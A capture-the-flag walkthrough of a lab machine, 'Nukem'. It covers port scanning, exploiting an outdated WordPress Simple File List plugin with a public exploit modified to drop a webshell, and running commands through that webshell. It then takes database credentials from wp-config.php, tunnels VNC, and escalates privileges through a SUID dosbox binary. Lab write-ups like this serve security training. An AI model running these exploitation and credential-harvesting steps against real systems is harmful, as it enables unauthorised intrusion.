Nukem
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 192.168.183.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 18:50 +08
Nmap scan report for 192.168.183.105
Host is up (0.17s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
5000/tcp open upnp
13000/tcp open unknown
36445/tcp open unknownRDP is open. Ran a detailed scan as well:
$ sudo nmap -p 80,5000,13000 -sC -sV --min-rate 3000 192.168.183.105
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 18:53 +08
Nmap scan report for 192.168.183.105
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
|_http-title: Retro Gamming – Just another WordPress site
|_http-generator: WordPress 5.5.1
5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: 404 Not Found
13000/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Login V14First thing I took note of was the outdated Wordpress site on port 80.
Wordpress -> RCE
I ran a wpscan on the port 80 application.
$ wpscan --api-token <API> --enumerate p,t,u --url http://192.168.183.105There were loads of vulnerabilities, but the one that looked the easiest to exploit was the Simple File List RCE:
[i] Plugin(s) Identified:
[+] simple-file-list
| Location: http://192.168.183.105/wp-content/plugins/simple-file-list/
| Last Updated: 2023-06-08T11:52:00.000Z
| [!] The version is out of date, the latest version is 6.1.8
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
| Fixed in: 4.2.3
| References:
| - https://wpscan.com/vulnerability/365da9c5-a8d0-45f6-863c-1b1926ffd574
| - https://simplefilelist.com/
| - https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list
| - https://packetstormsecurity.com/files/160221/Unauthenticated = good in this case. searchsploit shows that there are 2 exploits publicly available:
$ searchsploit Wordpress Plugin simple file list
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
WordPress Plugin Simple File List 4.2.2 - Arbitrary File U | php/webapps/48979.py
WordPress Plugin Simple File List 4.2.2 - Remote Code Exec | php/webapps/48449.py
----------------------------------------------------------- ---------------------------------I found that the first one worked better. Within the exploit, I also changed the payload to drop a webshell instead:
We can then run the exploit and confirm that it works:
$ python3 48979.py http://192.168.183.105
[ ] File 4345.png generated with password: 7a1538697392c42d7dbfb559c6fb67aa
[ ] File uploaded at http://192.168.183.105/wp-content/uploads/simple-file-list/4345.png
[ ] File moved to http://192.168.183.105/wp-content/uploads/simple-file-list/4345.php
[+] Exploit seem to work.
[*] Confirmning ...
$ curl http://192.168.183.105/wp-content/uploads/simple-file-list/4345.php?cmd=id
uid=33(http) gid=33(http) groups=33(http)Tested loads of ports, and only reverse shells to port 80 work:
Privilege Escalation
Commander Creds
The /srv/html/wp-config.php file contained some creds for the user commander:
/** MySQL database username */
define( 'DB_USER', 'commander' );
/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );
VNC + Dosbox SUID
I checked the SUID binaries available and found dosbox was one of them.
[commander@nukem ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/dosboxdosbox SUID privilege escalation exploits require a GUI to work, and conveniently, VNC on port 5901 is available on the machine:
[commander@nukem ~]$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 401/Xvnc
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:36445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:13000 0.0.0.0:* LISTEN -
tcp6 0 0 :::3306 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::36445 :::* LISTEN - Also, within the user's directory, there's a .vnc file which presumably contains credentials we need:
[commander@nukem ~]$ ls -la .vnc
total 20
drwxr-xr-x 2 commander root 4096 Sep 18 2020 .
drwxr-xr-x 11 commander commander 4096 Jul 12 11:03 ..
-rw-r--r-- 1 commander root 54 Sep 18 2020 config
-rw-r--r-- 1 commander commander 3479 Feb 17 19:27 nukem:1.log
-rw------- 1 commander commander 8 Sep 18 2020 passwdWe can transfer the small passwd file over to our machine via base64 encoding. Then, we can port forward VNC via chisel. Using vncviewer, we can connect to it:
$ vncviewer -passwd passwd 127.0.0.1:5901
Within the terminal we can run this:
dosbox -c 'mount c /' -c "type c:$LFILE"This would spawn a dosbox instance (which is basically a cmd.exe instance). Using the C: command, we can view the root flag:
There's no scrolling on this Dosbox instance, and the handling of control characters is a little inaccurate (so you can't really backspace). Other than that, we have root access over the file system and can do whatever we want.
Rooted!
Last updated